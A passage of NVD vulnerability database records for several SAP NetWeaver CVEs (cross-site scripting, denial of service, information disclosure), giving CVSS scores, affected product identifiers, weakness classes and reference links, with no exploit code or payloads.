"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-11-04T15:55:07.310",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/"
},
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "http://secunia.com/advisories/57606"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required"
],
"url": "http://service.sap.com/sap/support/notes/2067859"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "https://twitter.com/SAP_Gsupport/status/522401681997570048"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "http://secunia.com/advisories/57606"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "http://service.sap.com/sap/support/notes/2067859"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://twitter.com/SAP_Gsupport/status/522401681997570048"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-310"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-02-14 15:55
Modified
2024-11-21 02:05
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to the ESR application and a DIR error.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | - | |
| sap | netweaver_exchange_infrastructure_\(bc-xi\) | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_exchange_infrastructure_\\(bc-xi\\):-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFB48B81-B3DB-4F8C-893D-2D4010720727",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to the ESR application and a DIR error."
},
{
"lang": "es",
"value": "Vulnerabilidad de XSS en Integration Repository en el componente SAP Exchange Infrastructure (BC-XI) en SAP NetWeaver permite a atacantes remotos inyectar script Web o HTML arbitrarios a trav\u00e9s de vectores relacionados con la aplicaci\u00f3n ESR y un error DIR."
}
],
"id": "CVE-2014-1964",
"lastModified": "2024-11-21T02:05:21.933",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2014-02-14T15:55:07.563",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/56947"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91095"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1788080"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/56947"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91095"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1788080"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2024-01-09 02:15
Modified
2024-11-21 08:55
Severity ?
4.1 (Medium) - CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
Under certain conditions, Internet Communication Manager (ICM) or SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://me.sap.com/notes/3392626 | Permissions Required | |
| cna@sap.com | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Not Applicable | |
| af854a3a-2127-422b-91ae-364da2661108 | https://me.sap.com/notes/3392626 | Permissions Required | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | Not Applicable |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | kernel_7.22 | |
| sap | netweaver | kernel_7.53 | |
| sap | netweaver | kernel_7.54 | |
| sap | netweaver | krnl64nuc_7.22 | |
| sap | netweaver | krnl64nuc_7.22ext | |
| sap | netweaver | krnl64uc_7.22ext | |
| sap | netweaver | krnl64uc_7.53 | |
| sap | netweaver | webdisp_7.22ext | |
| sap | netweaver | webdisp_7.53 | |
| sap | netweaver | webdisp_7.54 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:kernel_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "87AABA4D-7683-47B4-BAF7-22AA42E074D4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:kernel_7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "D8A878F3-66B8-48B3-A5A7-7C79C0BB9E97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:kernel_7.54:*:*:*:*:*:*:*",
"matchCriteriaId": "9A487D94-65DD-4A28-A723-84653167C5B1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "2D28A3C2-D601-405F-A17C-6A6EBE43DF31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64nuc_7.22ext:*:*:*:*:*:*:*",
"matchCriteriaId": "CFA1A1F4-8C9C-42D2-9B77-4F4C6273EDDC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64uc_7.22ext:*:*:*:*:*:*:*",
"matchCriteriaId": "09865240-EF11-4326-AC78-A1EE106CE81E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:krnl64uc_7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "E5EE3473-85C3-4878-A2CD-09942AA53A6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:webdisp_7.22ext:*:*:*:*:*:*:*",
"matchCriteriaId": "E481B667-940B-49FA-B06B-FC219FE013E4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:webdisp_7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "63068441-48F0-4775-B93E-14601858489E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:webdisp_7.54:*:*:*:*:*:*:*",
"matchCriteriaId": "B646E701-8E48-4A0D-80F3-F41A0B61A0C9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions,\u00a0Internet Communication Manager (ICM) or\u00a0SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could\u00a0allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality.\n\n"
},
{
"lang": "es",
"value": "Bajo ciertas condiciones, Internet Communication Manager (ICM) o SAP Web Dispatcher - versiones KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT , WEBDISP 7.53, WEBDISP 7.54, podr\u00edan permitir que un atacante acceda a informaci\u00f3n que de otro modo estar\u00eda restringida y causar\u00eda un alto impacto en la confidencialidad."
}
],
"id": "CVE-2024-22124",
"lastModified": "2024-11-21T08:55:37.677",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.5,
"impactScore": 3.6,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-01-09T02:15:46.207",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3392626"
},
{
"source": "cna@sap.com",
"tags": [
"Not Applicable"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3392626"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-497"
}
],
"source": "cna@sap.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-05-15 04:21
Modified
2024-11-21 01:39
Severity ?
Summary
The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
},
{
"lang": "es",
"value": "La funci\u00f3n de Diaginput en disp+work.exe v7010.29.15.58313 y v7200.70.18.23869 en el distribuidor de la plataforma SAP NetWeaver v7.0 EHP1 y EHP2 permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda de demonio) a trav\u00e9s de un paquete dise\u00f1ado SAP Diag."
}
],
"id": "CVE-2012-2513",
"lastModified": "2024-11-21T01:39:09.950",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-05-15T04:21:43.453",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75455"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75455"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1687910"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2017-07-12 16:29
Modified
2024-11-21 03:36
Severity ?
Summary
disp+work 7400.12.21.30308 in SAP NetWeaver 7.40 allows remote attackers to cause a denial of service (resource consumption) via a crafted DIAG request, aka SAP Security Note 2405918.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "disp+work 7400.12.21.30308 in SAP NetWeaver 7.40 allows remote attackers to cause a denial of service (resource consumption) via a crafted DIAG request, aka SAP Security Note 2405918."
},
{
"lang": "es",
"value": "disp+work versi\u00f3n 7400.12.21.30308 en SAP NetWeaver versi\u00f3n 7.40 permite a los atacantes remotos causar una denegaci\u00f3n de servicio (consumo de recursos) por medio de una petici\u00f3n DIAG creada, tambi\u00e9n se conoce como Nota de Seguridad de SAP 2405918."
}
],
"id": "CVE-2017-9845",
"lastModified": "2024-11-21T03:36:58.403",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-07-12T16:29:00.453",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/96874"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/96874"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-17-015-sap-netweaver-dispwork-anonymous-denial-service/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-20 14:12
Modified
2024-11-21 01:59
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in Performance Provider in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in Performance Provider in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via unspecified vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad de XSS en Performance Provider in SAP NetWeaver permite a atacantes remotos inyectar script web o HTML arbitrario a trav\u00e9s de vectores sin especificar."
}
],
"id": "CVE-2013-6819",
"lastModified": "2024-11-21T01:59:46.160",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2013-11-20T14:12:30.977",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1784894"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/dsecrg-13-006-sap-netweaver-performance-provider-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1784894"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-06-13 03:15
Modified
2024-11-21 08:02
Severity ?
2.7 (Low) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L
2.7 (Low) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L
2.7 (Low) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L
Summary
SAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"matchCriteriaId": "6A503ABF-8655-40D7-96AD-2D7F19A673AE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
"matchCriteriaId": "8A9D5C5A-6963-438B-B0EA-2A621A34D8A9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
"matchCriteriaId": "BFFA1591-0304-4FAE-A6A7-72D04D1F41A3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
"matchCriteriaId": "7940A9AF-308E-4CE5-BA19-7A3DCF49F644",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:751:*:*:*:*:*:*:*",
"matchCriteriaId": "C09428E4-45BB-414D-9F3D-AA5C73D2DD5E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:752:*:*:*:*:*:*:*",
"matchCriteriaId": "5ED0BA7D-939D-4B05-81A3-9F991C8C04F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:753:*:*:*:*:*:*:*",
"matchCriteriaId": "0C2BF545-A7DC-4BB6-B894-D04CF163DD88",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:754:*:*:*:*:*:*:*",
"matchCriteriaId": "A75B2F18-60BE-41B5-82CB-520F794F2004",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:755:*:*:*:*:*:*:*",
"matchCriteriaId": "E31620E5-30FC-4545-A430-AAA77A66B51A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:756:*:*:*:*:*:*:*",
"matchCriteriaId": "9724E131-9893-4630-96A2-EB6032D98C58",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:757:*:*:*:*:*:*:*",
"matchCriteriaId": "8FEBCDDF-4828-45D1-A81D-FFB50261DBCA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application."
}
],
"id": "CVE-2023-32114",
"lastModified": "2024-11-21T08:02:44.223",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 1.4,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-06-13T03:15:09.393",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3325642"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3325642"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-732"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2023-04-11 03:15
Modified
2024-11-21 07:53
Severity ?
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
SAP GUI for HTML - versions KERNEL 7.22, 7.53, 7.54, 7.77, 7.81, 7.85, 7.89, 7.91, KRNL64UC, 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could craft a malicious URL and lure the victim to click, the script supplied by the attacker will execute in the victim user's browser. The information from the victim's web browser can either be modified or read and sent to the attacker.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sap | netweaver | 7.22ext | |
| sap | netweaver_application_server_abap | 7.22 | |
| sap | netweaver_application_server_abap | 7.53 | |
| sap | netweaver_application_server_abap | 7.54 | |
| sap | netweaver_application_server_abap | 7.77 | |
| sap | netweaver_application_server_abap | 7.81 | |
| sap | netweaver_application_server_abap | 7.85 | |
| sap | netweaver_application_server_abap | 7.89 | |
| sap | netweaver_application_server_abap | 7.91 | |
| sap | netweaver_application_server_abap | krnl64uc | |
| sap | netweaver_application_server_abap | krnl64uc_7.22 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.22ext:*:*:*:*:*:*:*",
"matchCriteriaId": "71AFBCEC-649C-4389-85C2-6C245290E91A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.22:*:*:*:*:*:*:*",
"matchCriteriaId": "16B3C589-DF11-459D-8A3F-1A1FD2265022",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.53:*:*:*:*:*:*:*",
"matchCriteriaId": "9E8CB869-C342-4362-9A4A-298F0B5F4003",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.54:*:*:*:*:*:*:*",
"matchCriteriaId": "92EBF7BA-BB05-4946-9CA8-E170AB80ECA3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver_application_server_abap:7.77:*:*:*:*:*:*:*",
"matchCriteriaId": "89E7439E-F4D6-45EA-99FC-C9B34D4D590E",
"vulnerable": true
